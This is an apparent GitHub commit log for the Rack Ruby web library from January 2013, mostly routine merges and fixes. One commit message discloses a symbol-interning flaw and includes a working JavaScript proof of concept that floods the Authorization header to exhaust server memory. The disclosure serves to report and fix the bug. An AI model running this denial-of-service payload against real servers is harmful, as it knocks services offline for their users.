Commits on Jan 22, 2013
  1. @raggi

    Switch to RFC 2822 expires

    raggi authored
Commits on Jan 21, 2013
  1. @raggi

    Fix a long standing misnomer for date formats

    raggi authored
    References #414
  2. @raggi
  3. @raggi
  4. @raggi

    Merge pull request #496 from homakov/patch-3

    raggi authored
    Remove never called string
Commits on Jan 14, 2013
  1. @homakov

    Remove never called string

    homakov authored
    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
Commits on Jan 13, 2013
  1. @raggi

    Update to 1.5.0.beta.2

    raggi authored
  2. @raggi

    Update README security notes

    raggi authored
  3. @raggi
  4. @raggi

    Rack::Auth::AbstractRequest#scheme returns strings

    raggi authored
     * This is a breaking API change, but doesn't appear to be used in public
  5. @raggi

    Squash test warnings

    raggi authored
  6. @raggi
  7. @raggi

    Squash warnings in spec_auth

    raggi authored
  8. @raggi

    Reimplement auth scheme fix

    raggi authored
     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - uses rails
     * Checked rack-authentication - does its own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does its own thing
     * Probably missed a bunch, but that'll have to do
  9. @raggi

    Revert "Merge pull request #494 from homakov/patch-2"

    raggi authored
    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
  10. @rkh

    Merge pull request #494 from homakov/patch-2

    rkh authored
    Remove .to_sym in Authorization scheme
  11. @homakov

    Remove .to_sym in Authorization scheme

    homakov authored
    Hello, `.to_sym` should never be applied to user input. Thus I recommend you change the `scheme` method:
    ```
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send an enormous number of `Authorization` headers, we can make it as long as possible.
    This is the PoC. App:
    ```
    $ cat config.ru
    require 'rack'
    run lambda { |e|
      auth = Rack::Auth::Basic::Request.new(e)
      puts auth.basic? if auth.provided?   # #basic? calls #scheme, which interns the header's first token
      puts Symbol.all_symbols.size          # grows on every request that carries a fresh scheme string
      [200, {'Content-Type' => 'text/html'}, ['IM FINE']]
    }
    ```
    Simple JavaScript to DoS it:
    ```
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0;
    for (var num = 0; num < base.length; num++) {
        var x = new XMLHttpRequest();
        x.open('GET', '/');
        var str = '';
        // 2,000,000 chunks per request: one huge scheme token that no earlier request has sent
        for (var i = 0; i < 2000000; i++) {
            str += 'Ё' + base[num] + i;
        }
        x.setRequestHeader('Authorization', str + ' lol');
        x.send();
        console.log('Total sent: ', total_sent += str.length);
    }
    ```
    When we run the JS every request carries 18888890 letters in a symbol. This 'data' will never be garbage collected.
    Should it be fixed?
Commits on Jan 11, 2013
  1. @raggi

    Merge branch 'hijack'

    raggi authored
    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
  2. @raggi
  3. @raggi

    Add q-value helpers for Accept headers, etc.

    raggi authored
     * Supersedes and closes #443
  4. @raggi
  5. @raggi

    Minor code review comments closing #451

    raggi authored
     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
  6. @raggi

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    raggi authored
    This reverts commit 3b24fa9.
  7. @raggi

    Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/rack into sendfile

    raggi authored
    
    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compatibility
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
  8. @raggi

    Enable unix sockets with paths as trusted proxies

    raggi authored
     * Supersedes and closes #488
  9. @raggi

    Merge pull request #491 from spastorino/allow_build_different_session_object

    raggi authored

    Allow subclasses to build a different Session Object
  10. @spastorino
  11. @raggi

    Merge pull request #490 from slivu/master

    raggi authored
    Added Reel Web Server and Espresso Framework to supported software list
  12. @raggi

    Merge pull request #489 from spastorino/abstract_id_tiny_patches

    raggi authored
    Abstract id tiny patches
Commits on Jan 10, 2013
  1. Update README.rdoc

    slivu authored
  2. @spastorino
  3. @spastorino
  4. @spastorino
Commits on Jan 9, 2013
  1. @spastorino
Commits on Jan 7, 2013
  1. @raggi

    Merge pull request #487 from carlosantoniodasilva/remove-warnings

    raggi authored
    Remove warnings: 'not used variable' and 'shadowing outer variable'